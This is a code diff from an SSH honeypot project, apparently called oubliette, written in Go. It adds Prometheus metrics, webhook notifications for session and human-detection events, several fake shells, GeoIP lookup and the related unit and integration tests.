"Total sessions in storage.",
nil, nil,
)
)
func (c *storeCollector) Describe(ch chan<- *prometheus.Desc) {
ch <- storageLoginAttemptsDesc
ch <- storageUniqueIPsDesc
ch <- storageSessionsDesc
}
func (c *storeCollector) Collect(ch chan<- prometheus.Metric) {
stats, err := c.store.GetDashboardStats(context.Background())
if err != nil {
return
}
ch <- prometheus.MustNewConstMetric(storageLoginAttemptsDesc, prometheus.GaugeValue, float64(stats.TotalAttempts))
ch <- prometheus.MustNewConstMetric(storageUniqueIPsDesc, prometheus.GaugeValue, float64(stats.UniqueIPs))
ch <- prometheus.MustNewConstMetric(storageSessionsDesc, prometheus.GaugeValue, float64(stats.TotalSessions))
}

View File

@@ -0,0 +1,142 @@
package metrics
import (
"context"
"io"
"net/http"
"net/http/httptest"
"strings"
"testing"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
func TestNew(t *testing.T) {
m := New("1.2.3")
// Gather all metrics and check expected names exist.
families, err := m.registry.Gather()
if err != nil {
t.Fatalf("gather: %v", err)
}
want := map[string]bool{
"oubliette_ssh_connections_total": false,
"oubliette_ssh_connections_active": false,
"oubliette_auth_attempts_total": false,
"oubliette_commands_executed_total": false,
"oubliette_human_score": false,
"oubliette_sessions_total": false,
"oubliette_sessions_active": false,
"oubliette_session_duration_seconds": false,
"oubliette_build_info": false,
}
for _, f := range families {
if _, ok := want[f.GetName()]; ok {
want[f.GetName()] = true
}
}
for name, found := range want {
if !found {
t.Errorf("metric %q not registered", name)
}
}
}
func TestAuthAttemptsByCountry(t *testing.T) {
m := New("1.0.0")
m.AuthAttemptsByCountry.WithLabelValues("US").Inc()
m.AuthAttemptsByCountry.WithLabelValues("DE").Inc()
m.AuthAttemptsByCountry.WithLabelValues("US").Inc()
families, err := m.registry.Gather()
if err != nil {
t.Fatalf("gather: %v", err)
}
var found bool
for _, f := range families {
if f.GetName() == "oubliette_auth_attempts_by_country_total" {
found = true
if len(f.GetMetric()) != 2 {
t.Errorf("expected 2 label pairs (US, DE), got %d", len(f.GetMetric()))
}
}
}
if !found {
t.Error("oubliette_auth_attempts_by_country_total not found after incrementing")
}
}
func TestHandler(t *testing.T) {
m := New("1.2.3")
req := httptest.NewRequest(http.MethodGet, "/metrics", nil)
w := httptest.NewRecorder()
m.Handler().ServeHTTP(w, req)
if w.Code != http.StatusOK {
t.Errorf("status = %d, want 200", w.Code)
}
body, err := io.ReadAll(w.Body)
if err != nil {
t.Fatalf("reading body: %v", err)
}
if !strings.Contains(string(body), `oubliette_build_info{version="1.2.3"} 1`) {
t.Errorf("response should contain build_info metric, got:\n%s", body)
}
}
func TestStoreCollector(t *testing.T) {
store := storage.NewMemoryStore()
ctx := context.Background()
// Seed some data.
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
t.Fatalf("RecordLoginAttempt: %v", err)
}
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.2", ""); err != nil {
t.Fatalf("RecordLoginAttempt: %v", err)
}
if _, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", ""); err != nil {
t.Fatalf("CreateSession: %v", err)
}
m := New("test")
m.RegisterStoreCollector(store)
families, err := m.registry.Gather()
if err != nil {
t.Fatalf("gather: %v", err)
}
wantMetrics := map[string]float64{
"oubliette_storage_login_attempts_total": 2,
"oubliette_storage_unique_ips": 2,
"oubliette_storage_sessions_total": 1,
}
for _, f := range families {
expected, ok := wantMetrics[f.GetName()]
if !ok {
continue
}
if len(f.GetMetric()) == 0 {
t.Errorf("metric %q has no samples", f.GetName())
continue
}
got := f.GetMetric()[0].GetGauge().GetValue()
if got != expected {
t.Errorf("metric %q = %f, want %f", f.GetName(), got, expected)
}
delete(wantMetrics, f.GetName())
}
for name := range wantMetrics {
t.Errorf("metric %q not found in gather output", name)
}
}

175
internal/notify/webhook.go Normal file
View File

@@ -0,0 +1,175 @@
package notify
import (
"bytes"
"context"
"encoding/json"
"log/slog"
"net/http"
"slices"
"sync"
"time"
"code.t-juice.club/torjus/oubliette/internal/config"
)
// Event types.
const (
EventHumanDetected = "human_detected"
EventSessionStarted = "session_started"
)
// SessionInfo holds session data included in webhook payloads.
type SessionInfo struct {
ID string `json:"id"`
IP string `json:"ip"`
Username string `json:"username"`
ShellName string `json:"shell_name"`
HumanScore float64 `json:"human_score"`
ConnectedAt string `json:"connected_at"`
}
// webhookPayload is the JSON body sent to webhooks.
type webhookPayload struct {
Event string `json:"event"`
Timestamp string `json:"timestamp"`
Session SessionInfo `json:"session"`
}
// Notifier sends webhook notifications for honeypot events.
type Notifier struct {
webhooks []config.WebhookNotifyConfig
logger *slog.Logger
client *http.Client
mu sync.Mutex
sent map[string]struct{} // dedup key: "sessionID:eventType"
}
// NewNotifier creates a Notifier with the given webhook configurations.
func NewNotifier(webhooks []config.WebhookNotifyConfig, logger *slog.Logger) *Notifier {
return &Notifier{
webhooks: webhooks,
logger: logger,
client: &http.Client{Timeout: 10 * time.Second},
sent: make(map[string]struct{}),
}
}
// Notify sends a notification for the given event type and session.
// Deduplicates by (sessionID, eventType) — each combination is sent at most once.
func (n *Notifier) Notify(ctx context.Context, eventType string, session SessionInfo) {
dedupKey := session.ID + ":" + eventType
n.mu.Lock()
if _, ok := n.sent[dedupKey]; ok {
n.mu.Unlock()
return
}
n.sent[dedupKey] = struct{}{}
n.mu.Unlock()
payload := webhookPayload{
Event: eventType,
Timestamp: time.Now().UTC().Format(time.RFC3339),
Session: session,
}
for _, wh := range n.webhooks {
if !n.shouldSend(wh, eventType) {
continue
}
go n.send(ctx, wh, payload)
}
}
// CleanupSession removes dedup state for a session.
func (n *Notifier) CleanupSession(sessionID string) {
n.mu.Lock()
defer n.mu.Unlock()
for key := range n.sent {
if len(key) > len(sessionID) && key[:len(sessionID)+1] == sessionID+":" {
delete(n.sent, key)
}
}
}
// shouldSend returns true if the webhook is configured to receive this event type.
func (n *Notifier) shouldSend(wh config.WebhookNotifyConfig, eventType string) bool {
if len(wh.Events) == 0 {
return true // empty = all events
}
return slices.Contains(wh.Events, eventType)
}
func (n *Notifier) send(ctx context.Context, wh config.WebhookNotifyConfig, payload webhookPayload) {
body, err := json.Marshal(payload)
if err != nil {
n.logger.Error("failed to marshal webhook payload", "err", err)
return
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, wh.URL, bytes.NewReader(body))
if err != nil {
n.logger.Error("failed to create webhook request", "err", err, "url", wh.URL)
return
}
req.Header.Set("Content-Type", "application/json")
for k, v := range wh.Headers {
req.Header.Set(k, v)
}
resp, err := n.client.Do(req)
if err != nil {
n.logger.Error("webhook request failed", "err", err, "url", wh.URL)
return
}
defer func() { _ = resp.Body.Close() }()
if resp.StatusCode >= 400 {
n.logger.Warn("webhook returned error status",
"url", wh.URL,
"status", resp.StatusCode,
"event", payload.Event,
)
return
}
n.logger.Debug("webhook sent",
"url", wh.URL,
"event", payload.Event,
"session_id", payload.Session.ID,
)
}
// FormatConnectedAt formats a time for use in SessionInfo.
func FormatConnectedAt(t time.Time) string {
return t.UTC().Format(time.RFC3339)
}
// NoopNotifier is a no-op notifier used when no webhooks are configured.
type NoopNotifier struct{}
func (NoopNotifier) Notify(context.Context, string, SessionInfo) {}
func (NoopNotifier) CleanupSession(string) {}
// Sender is the interface for sending notifications.
type Sender interface {
Notify(ctx context.Context, eventType string, session SessionInfo)
CleanupSession(sessionID string)
}
var (
_ Sender = (*Notifier)(nil)
_ Sender = NoopNotifier{}
)
// NewSender creates a Sender from configuration. Returns a NoopNotifier
// if no webhooks are configured.
func NewSender(webhooks []config.WebhookNotifyConfig, logger *slog.Logger) Sender {
if len(webhooks) == 0 {
return NoopNotifier{}
}
return NewNotifier(webhooks, logger)
}

View File

@@ -0,0 +1,243 @@
package notify
import (
"context"
"encoding/json"
"log/slog"
"net/http"
"net/http/httptest"
"sync"
"testing"
"time"
"code.t-juice.club/torjus/oubliette/internal/config"
)
func testSession() SessionInfo {
return SessionInfo{
ID: "test-session-123",
IP: "1.2.3.4",
Username: "root",
ShellName: "bash",
HumanScore: 0.85,
ConnectedAt: FormatConnectedAt(time.Now()),
}
}
func TestNotifier_PayloadStructure(t *testing.T) {
var received webhookPayload
var mu sync.Mutex
done := make(chan struct{})
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
mu.Lock()
defer mu.Unlock()
if err := json.NewDecoder(r.Body).Decode(&received); err != nil {
t.Errorf("failed to decode payload: %v", err)
}
w.WriteHeader(http.StatusOK)
close(done)
}))
defer srv.Close()
webhooks := []config.WebhookNotifyConfig{
{URL: srv.URL},
}
n := NewNotifier(webhooks, slog.Default())
session := testSession()
n.Notify(context.Background(), EventHumanDetected, session)
select {
case <-done:
case <-time.After(2 * time.Second):
t.Fatal("timeout waiting for webhook")
}
mu.Lock()
defer mu.Unlock()
if received.Event != EventHumanDetected {
t.Errorf("event: got %q, want %q", received.Event, EventHumanDetected)
}
if received.Session.ID != session.ID {
t.Errorf("session ID: got %q, want %q", received.Session.ID, session.ID)
}
if received.Session.IP != session.IP {
t.Errorf("session IP: got %q, want %q", received.Session.IP, session.IP)
}
if received.Session.HumanScore != session.HumanScore {
t.Errorf("score: got %f, want %f", received.Session.HumanScore, session.HumanScore)
}
if received.Timestamp == "" {
t.Error("timestamp should not be empty")
}
}
func TestNotifier_CustomHeaders(t *testing.T) {
var receivedHeaders http.Header
done := make(chan struct{})
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
receivedHeaders = r.Header.Clone()
w.WriteHeader(http.StatusOK)
close(done)
}))
defer srv.Close()
webhooks := []config.WebhookNotifyConfig{
{
URL: srv.URL,
Headers: map[string]string{
"Authorization": "Bearer test-token",
"X-Custom": "my-value",
},
},
}
n := NewNotifier(webhooks, slog.Default())
n.Notify(context.Background(), EventSessionStarted, testSession())
select {
case <-done:
case <-time.After(2 * time.Second):
t.Fatal("timeout waiting for webhook")
}
if got := receivedHeaders.Get("Authorization"); got != "Bearer test-token" {
t.Errorf("Authorization header: got %q, want %q", got, "Bearer test-token")
}
if got := receivedHeaders.Get("X-Custom"); got != "my-value" {
t.Errorf("X-Custom header: got %q, want %q", got, "my-value")
}
if got := receivedHeaders.Get("Content-Type"); got != "application/json" {
t.Errorf("Content-Type: got %q, want %q", got, "application/json")
}
}
func TestNotifier_Deduplication(t *testing.T) {
var count int
var mu sync.Mutex
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
mu.Lock()
count++
mu.Unlock()
w.WriteHeader(http.StatusOK)
}))
defer srv.Close()
webhooks := []config.WebhookNotifyConfig{{URL: srv.URL}}
n := NewNotifier(webhooks, slog.Default())
session := testSession()
// Send same event three times for the same session.
for range 3 {
n.Notify(context.Background(), EventHumanDetected, session)
}
// Allow goroutines to complete.
time.Sleep(500 * time.Millisecond)
mu.Lock()
defer mu.Unlock()
if count != 1 {
t.Errorf("dedup: got %d sends, want 1", count)
}
}
func TestNotifier_EventFiltering(t *testing.T) {
var receivedEvents []string
var mu sync.Mutex
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
var payload webhookPayload
_ = json.NewDecoder(r.Body).Decode(&payload)
mu.Lock()
receivedEvents = append(receivedEvents, payload.Event)
mu.Unlock()
w.WriteHeader(http.StatusOK)
}))
defer srv.Close()
// Only subscribe to human_detected.
webhooks := []config.WebhookNotifyConfig{
{
URL: srv.URL,
Events: []string{EventHumanDetected},
},
}
n := NewNotifier(webhooks, slog.Default())
session := testSession()
// Send both event types.
n.Notify(context.Background(), EventSessionStarted, session)
// Need a different session for human_detected to avoid dedup with same session.
session2 := testSession()
session2.ID = "test-session-456"
n.Notify(context.Background(), EventHumanDetected, session2)
time.Sleep(500 * time.Millisecond)
mu.Lock()
defer mu.Unlock()
if len(receivedEvents) != 1 {
t.Fatalf("event filtering: got %d events, want 1", len(receivedEvents))
}
if receivedEvents[0] != EventHumanDetected {
t.Errorf("filtered event: got %q, want %q", receivedEvents[0], EventHumanDetected)
}
}
func TestNotifier_CleanupSession(t *testing.T) {
var count int
var mu sync.Mutex
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
mu.Lock()
count++
mu.Unlock()
w.WriteHeader(http.StatusOK)
}))
defer srv.Close()
webhooks := []config.WebhookNotifyConfig{{URL: srv.URL}}
n := NewNotifier(webhooks, slog.Default())
session := testSession()
n.Notify(context.Background(), EventHumanDetected, session)
time.Sleep(200 * time.Millisecond)
// Cleanup and resend — should work again.
n.CleanupSession(session.ID)
n.Notify(context.Background(), EventHumanDetected, session)
time.Sleep(200 * time.Millisecond)
mu.Lock()
defer mu.Unlock()
if count != 2 {
t.Errorf("after cleanup: got %d sends, want 2", count)
}
}
func TestNoopNotifier(t *testing.T) {
// Should not panic.
n := NoopNotifier{}
n.Notify(context.Background(), EventHumanDetected, testSession())
n.CleanupSession("test")
}
func TestNewSender_NoWebhooks(t *testing.T) {
sender := NewSender(nil, slog.Default())
if _, ok := sender.(NoopNotifier); !ok {
t.Errorf("expected NoopNotifier, got %T", sender)
}
}
func TestNewSender_WithWebhooks(t *testing.T) {
webhooks := []config.WebhookNotifyConfig{{URL: "http://example.com"}}
sender := NewSender(webhooks, slog.Default())
if _, ok := sender.(*Notifier); !ok {
t.Errorf("expected *Notifier, got %T", sender)
}
}

View File

@@ -12,14 +12,25 @@ import (
"os" "os"
"time" "time"
"git.t-juice.club/torjus/oubliette/internal/auth" "code.t-juice.club/torjus/oubliette/internal/auth"
"git.t-juice.club/torjus/oubliette/internal/config" "code.t-juice.club/torjus/oubliette/internal/config"
"git.t-juice.club/torjus/oubliette/internal/storage" "code.t-juice.club/torjus/oubliette/internal/detection"
"code.t-juice.club/torjus/oubliette/internal/geoip"
"code.t-juice.club/torjus/oubliette/internal/metrics"
"code.t-juice.club/torjus/oubliette/internal/notify"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/shell/adventure"
"code.t-juice.club/torjus/oubliette/internal/shell/banking"
"code.t-juice.club/torjus/oubliette/internal/shell/bash"
"code.t-juice.club/torjus/oubliette/internal/shell/cisco"
"code.t-juice.club/torjus/oubliette/internal/shell/fridge"
psqlshell "code.t-juice.club/torjus/oubliette/internal/shell/psql"
"code.t-juice.club/torjus/oubliette/internal/shell/roomba"
"code.t-juice.club/torjus/oubliette/internal/shell/tetris"
"code.t-juice.club/torjus/oubliette/internal/storage"
"golang.org/x/crypto/ssh" "golang.org/x/crypto/ssh"
) )
const sessionTimeout = 30 * time.Second
type Server struct { type Server struct {
cfg config.Config cfg config.Config
store storage.Store store storage.Store
@@ -27,15 +38,54 @@ type Server struct {
sshConfig *ssh.ServerConfig sshConfig *ssh.ServerConfig
logger *slog.Logger logger *slog.Logger
connSem chan struct{} // semaphore limiting concurrent connections connSem chan struct{} // semaphore limiting concurrent connections
shellRegistry *shell.Registry
notifier notify.Sender
metrics *metrics.Metrics
geoip *geoip.Reader
}
func New(cfg config.Config, store storage.Store, logger *slog.Logger, m *metrics.Metrics) (*Server, error) {
registry := shell.NewRegistry()
if err := registry.Register(bash.NewBashShell(), 1); err != nil {
return nil, fmt.Errorf("registering bash shell: %w", err)
}
if err := registry.Register(fridge.NewFridgeShell(), 1); err != nil {
return nil, fmt.Errorf("registering fridge shell: %w", err)
}
if err := registry.Register(banking.NewBankingShell(), 1); err != nil {
return nil, fmt.Errorf("registering banking shell: %w", err)
}
if err := registry.Register(adventure.NewAdventureShell(), 1); err != nil {
return nil, fmt.Errorf("registering adventure shell: %w", err)
}
if err := registry.Register(cisco.NewCiscoShell(), 1); err != nil {
return nil, fmt.Errorf("registering cisco shell: %w", err)
}
if err := registry.Register(psqlshell.NewPsqlShell(), 1); err != nil {
return nil, fmt.Errorf("registering psql shell: %w", err)
}
if err := registry.Register(roomba.NewRoombaShell(), 1); err != nil {
return nil, fmt.Errorf("registering roomba shell: %w", err)
}
if err := registry.Register(tetris.NewTetrisShell(), 1); err != nil {
return nil, fmt.Errorf("registering tetris shell: %w", err)
}
geo, err := geoip.New()
if err != nil {
return nil, fmt.Errorf("opening geoip database: %w", err)
} }
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
s := &Server{ s := &Server{
cfg: cfg, cfg: cfg,
store: store, store: store,
authenticator: auth.NewAuthenticator(cfg.Auth), authenticator: auth.NewAuthenticator(cfg.Auth),
logger: logger, logger: logger,
connSem: make(chan struct{}, cfg.SSH.MaxConnections), connSem: make(chan struct{}, cfg.SSH.MaxConnections),
shellRegistry: registry,
notifier: notify.NewSender(cfg.Notify.Webhooks, logger),
metrics: m,
geoip: geo,
} }
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath) hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
@@ -53,6 +103,8 @@ func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server,
} }
func (s *Server) ListenAndServe(ctx context.Context) error { func (s *Server) ListenAndServe(ctx context.Context) error {
defer s.geoip.Close()
listener, err := net.Listen("tcp", s.cfg.SSH.ListenAddr) listener, err := net.Listen("tcp", s.cfg.SSH.ListenAddr)
if err != nil { if err != nil {
return fmt.Errorf("listen: %w", err) return fmt.Errorf("listen: %w", err)
@@ -79,11 +131,16 @@ func (s *Server) ListenAndServe(ctx context.Context) error {
// Enforce max concurrent connections. // Enforce max concurrent connections.
select { select {
case s.connSem <- struct{}{}: case s.connSem <- struct{}{}:
s.metrics.SSHConnectionsActive.Inc()
go func() { go func() {
defer func() { <-s.connSem }() defer func() {
<-s.connSem
s.metrics.SSHConnectionsActive.Dec()
}()
s.handleConn(conn) s.handleConn(conn)
}() }()
default: default:
s.metrics.SSHConnectionsTotal.WithLabelValues("rejected_max_connections").Inc()
s.logger.Warn("max connections reached, rejecting", "remote_addr", conn.RemoteAddr()) s.logger.Warn("max connections reached, rejecting", "remote_addr", conn.RemoteAddr())
conn.Close() conn.Close()
} }
@@ -95,11 +152,13 @@ func (s *Server) handleConn(conn net.Conn) {
sshConn, chans, reqs, err := ssh.NewServerConn(conn, s.sshConfig) sshConn, chans, reqs, err := ssh.NewServerConn(conn, s.sshConfig)
if err != nil { if err != nil {
s.metrics.SSHConnectionsTotal.WithLabelValues("rejected_handshake").Inc()
s.logger.Debug("SSH handshake failed", "remote_addr", conn.RemoteAddr(), "err", err) s.logger.Debug("SSH handshake failed", "remote_addr", conn.RemoteAddr(), "err", err)
return return
} }
defer sshConn.Close() defer sshConn.Close()
s.metrics.SSHConnectionsTotal.WithLabelValues("accepted").Inc()
s.logger.Info("SSH connection established", s.logger.Info("SSH connection established",
"remote_addr", sshConn.RemoteAddr(), "remote_addr", sshConn.RemoteAddr(),
"user", sshConn.User(), "user", sshConn.User(),
@@ -126,26 +185,94 @@ func (s *Server) handleConn(conn net.Conn) {
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) { func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
defer channel.Close() defer channel.Close()
// Select a shell from the registry.
// If the auth layer specified a shell preference, use it; otherwise random.
var selectedShell shell.Shell
if conn.Permissions != nil && conn.Permissions.Extensions["shell"] != "" {
shellName := conn.Permissions.Extensions["shell"]
sh, ok := s.shellRegistry.Get(shellName)
if ok {
selectedShell = sh
} else {
s.logger.Warn("configured shell not found, falling back to random", "shell", shellName)
}
}
// Second priority: username-based route.
if selectedShell == nil {
if shellName, ok := s.cfg.Shell.UsernameRoutes[conn.User()]; ok {
sh, found := s.shellRegistry.Get(shellName)
if found {
selectedShell = sh
} else {
s.logger.Warn("username route shell not found, falling back to random", "shell", shellName, "user", conn.User())
}
}
}
// Lowest priority: random selection.
if selectedShell == nil {
var err error
selectedShell, err = s.shellRegistry.Select()
if err != nil {
s.logger.Error("failed to select shell", "err", err)
return
}
}
ip := extractIP(conn.RemoteAddr()) ip := extractIP(conn.RemoteAddr())
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "") country := s.geoip.Lookup(ip)
sessionStart := time.Now()
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name(), country)
if err != nil { if err != nil {
s.logger.Error("failed to create session", "err", err) s.logger.Error("failed to create session", "err", err)
} else { } else {
s.metrics.SessionsTotal.WithLabelValues(selectedShell.Name()).Inc()
s.metrics.SessionsActive.Inc()
defer func() { defer func() {
s.metrics.SessionsActive.Dec()
s.metrics.SessionDuration.Observe(time.Since(sessionStart).Seconds())
if err := s.store.EndSession(context.Background(), sessionID, time.Now()); err != nil { if err := s.store.EndSession(context.Background(), sessionID, time.Now()); err != nil {
s.logger.Error("failed to end session", "err", err) s.logger.Error("failed to end session", "err", err)
} }
}() }()
} }
// Handle session requests (pty-req, shell, etc.) s.logger.Info("session started",
"remote_addr", conn.RemoteAddr(),
"user", conn.User(),
"shell", selectedShell.Name(),
"session_id", sessionID,
)
// Send session_started notification.
connectedAt := time.Now()
sessionInfo := notify.SessionInfo{
ID: sessionID,
IP: ip,
Username: conn.User(),
ShellName: selectedShell.Name(),
ConnectedAt: notify.FormatConnectedAt(connectedAt),
}
s.notifier.Notify(context.Background(), notify.EventSessionStarted, sessionInfo)
defer s.notifier.CleanupSession(sessionID)
// Handle session requests (pty-req, shell, exec, etc.)
execCh := make(chan string, 1)
go func() { go func() {
defer close(execCh)
for req := range requests { for req := range requests {
switch req.Type { switch req.Type {
case "pty-req", "shell": case "pty-req", "shell":
if req.WantReply { if req.WantReply {
req.Reply(true, nil) req.Reply(true, nil)
} }
case "exec":
if req.WantReply {
req.Reply(true, nil)
}
var payload struct{ Command string }
if err := ssh.Unmarshal(req.Payload, &payload); err == nil {
execCh <- payload.Command
}
default: default:
if req.WantReply { if req.WantReply {
req.Reply(false, nil) req.Reply(false, nil)
@@ -154,32 +281,127 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
} }
}() }()
// Write a fake banner. // Check for exec request before proceeding to interactive shell.
fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n") select {
fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006")) case cmd, ok := <-execCh:
fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User()) if ok && cmd != "" {
s.logger.Info("exec command received",
// Hold connection open until timeout or client disconnect. "remote_addr", conn.RemoteAddr(),
timer := time.NewTimer(sessionTimeout) "user", conn.User(),
defer timer.Stop() "session_id", sessionID,
"command", cmd,
done := make(chan struct{}) )
go func() { if err := s.store.SetExecCommand(context.Background(), sessionID, cmd); err != nil {
buf := make([]byte, 256) s.logger.Error("failed to set exec command", "err", err, "session_id", sessionID)
for { }
_, err := channel.Read(buf) s.metrics.ExecCommandsTotal.Inc()
if err != nil { // Send exit-status 0 and close channel.
close(done) exitPayload := make([]byte, 4) // uint32(0)
_, _ = channel.SendRequest("exit-status", false, exitPayload)
return return
} }
case <-time.After(500 * time.Millisecond):
// No exec request within timeout — proceed with interactive shell.
} }
}()
// Build session context.
var shellCfg map[string]any
if s.cfg.Shell.Shells != nil {
shellCfg = s.cfg.Shell.Shells[selectedShell.Name()]
}
sessCtx := &shell.SessionContext{
SessionID: sessionID,
Username: conn.User(),
RemoteAddr: ip,
ClientVersion: string(conn.ClientVersion()),
Store: s.store,
ShellConfig: shellCfg,
CommonConfig: shell.ShellCommonConfig{
Hostname: s.cfg.Shell.Hostname,
Banner: s.cfg.Shell.Banner,
FakeUser: s.cfg.Shell.FakeUser,
},
OnCommand: func(sh string) {
s.metrics.CommandsExecuted.WithLabelValues(sh).Inc()
},
}
// Wrap channel in RecordingChannel.
recorder := shell.NewRecordingChannel(channel)
// Always record session events for replay.
eventRec := shell.NewEventRecorder(sessionID, s.store, s.logger)
eventRec.Start(context.Background())
defer eventRec.Close()
recorder.AddCallback(eventRec.RecordEvent)
// Set up detection scorer if enabled.
var scorer *detection.Scorer
var scoreCancel context.CancelFunc
if s.cfg.Detection.Enabled {
scorer = detection.NewScorer()
recorder.AddCallback(func(ts time.Time, direction int, data []byte) {
scorer.RecordEvent(ts, direction, data)
})
var scoreCtx context.Context
scoreCtx, scoreCancel = context.WithCancel(context.Background())
go s.runScoreUpdater(scoreCtx, sessionID, scorer, sessionInfo)
}
if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil {
s.logger.Error("shell error", "err", err, "session_id", sessionID)
}
// Stop score updater and write final score.
if scoreCancel != nil {
scoreCancel()
}
if scorer != nil {
finalScore := scorer.Score()
s.metrics.HumanScore.Observe(finalScore)
if err := s.store.UpdateHumanScore(context.Background(), sessionID, finalScore); err != nil {
s.logger.Error("failed to write final human score", "err", err, "session_id", sessionID)
}
s.logger.Info("session ended",
"remote_addr", conn.RemoteAddr(),
"user", conn.User(),
"session_id", sessionID,
"human_score", finalScore,
)
} else {
s.logger.Info("session ended",
"remote_addr", conn.RemoteAddr(),
"user", conn.User(),
"session_id", sessionID,
)
}
}
// runScoreUpdater periodically computes the human score, writes it to the DB,
// and triggers a notification if the threshold is crossed.
func (s *Server) runScoreUpdater(ctx context.Context, sessionID string, scorer *detection.Scorer, sessionInfo notify.SessionInfo) {
ticker := time.NewTicker(s.cfg.Detection.UpdateIntervalDuration)
defer ticker.Stop()
for {
select { select {
case <-timer.C: case <-ctx.Done():
s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User()) return
case <-done: case <-ticker.C:
s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User()) score := scorer.Score()
if err := s.store.UpdateHumanScore(ctx, sessionID, score); err != nil {
s.logger.Error("failed to update human score", "err", err, "session_id", sessionID)
continue
}
s.logger.Debug("human score updated", "session_id", sessionID, "score", score)
if score >= s.cfg.Detection.Threshold {
info := sessionInfo
info.HumanScore = score
s.notifier.Notify(ctx, notify.EventHumanDetected, info)
}
}
} }
} }
@@ -187,6 +409,12 @@ func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.
ip := extractIP(conn.RemoteAddr()) ip := extractIP(conn.RemoteAddr())
d := s.authenticator.Authenticate(ip, conn.User(), string(password)) d := s.authenticator.Authenticate(ip, conn.User(), string(password))
if d.Accepted {
s.metrics.AuthAttemptsTotal.WithLabelValues("accepted", d.Reason).Inc()
} else {
s.metrics.AuthAttemptsTotal.WithLabelValues("rejected", d.Reason).Inc()
}
s.logger.Info("auth attempt", s.logger.Info("auth attempt",
"remote_addr", conn.RemoteAddr(), "remote_addr", conn.RemoteAddr(),
"username", conn.User(), "username", conn.User(),
@@ -194,12 +422,22 @@ func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.
"reason", d.Reason, "reason", d.Reason,
) )
if err := s.store.RecordLoginAttempt(context.Background(), conn.User(), string(password), ip); err != nil { country := s.geoip.Lookup(ip)
if country != "" {
s.metrics.AuthAttemptsByCountry.WithLabelValues(country).Inc()
}
if err := s.store.RecordLoginAttempt(context.Background(), conn.User(), string(password), ip, country); err != nil {
s.logger.Error("failed to record login attempt", "err", err) s.logger.Error("failed to record login attempt", "err", err)
} }
if d.Accepted { if d.Accepted {
return nil, nil var perms *ssh.Permissions
if d.Shell != "" {
perms = &ssh.Permissions{
Extensions: map[string]string{"shell": d.Shell},
}
}
return perms, nil
} }
return nil, fmt.Errorf("rejected") return nil, fmt.Errorf("rejected")
} }

View File

@@ -1,16 +1,20 @@
package server package server
import ( import (
"bytes"
"context" "context"
"log/slog" "log/slog"
"net" "net"
"os" "os"
"path/filepath" "path/filepath"
"strings"
"testing" "testing"
"time" "time"
"git.t-juice.club/torjus/oubliette/internal/config" "code.t-juice.club/torjus/oubliette/internal/auth"
"git.t-juice.club/torjus/oubliette/internal/storage" "code.t-juice.club/torjus/oubliette/internal/config"
"code.t-juice.club/torjus/oubliette/internal/metrics"
"code.t-juice.club/torjus/oubliette/internal/storage"
"golang.org/x/crypto/ssh" "golang.org/x/crypto/ssh"
) )
@@ -106,15 +110,19 @@ func TestIntegrationSSHConnect(t *testing.T) {
AcceptAfter: 2, AcceptAfter: 2,
CredentialTTLDuration: time.Hour, CredentialTTLDuration: time.Hour,
StaticCredentials: []config.Credential{ StaticCredentials: []config.Credential{
{Username: "root", Password: "toor"}, {Username: "root", Password: "toor", Shell: "bash"},
}, },
}, },
Shell: config.ShellConfig{
Hostname: "ubuntu-server",
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
},
LogLevel: "debug", LogLevel: "debug",
} }
logger := slog.New(slog.NewTextHandler(os.Stderr, &slog.HandlerOptions{Level: slog.LevelDebug})) logger := slog.New(slog.NewTextHandler(os.Stderr, &slog.HandlerOptions{Level: slog.LevelDebug}))
store := storage.NewMemoryStore() store := storage.NewMemoryStore()
srv, err := New(cfg, store, logger) srv, err := New(cfg, store, logger, metrics.New("test"))
if err != nil { if err != nil {
t.Fatalf("creating server: %v", err) t.Fatalf("creating server: %v", err)
} }
@@ -152,7 +160,7 @@ func TestIntegrationSSHConnect(t *testing.T) {
time.Sleep(50 * time.Millisecond) time.Sleep(50 * time.Millisecond)
} }
// Test static credential login. // Test static credential login with shell interaction.
t.Run("static_cred", func(t *testing.T) { t.Run("static_cred", func(t *testing.T) {
clientCfg := &ssh.ClientConfig{ clientCfg := &ssh.ClientConfig{
User: "root", User: "root",
@@ -172,6 +180,62 @@ func TestIntegrationSSHConnect(t *testing.T) {
t.Fatalf("new session: %v", err) t.Fatalf("new session: %v", err)
} }
defer session.Close() defer session.Close()
// Request PTY and shell.
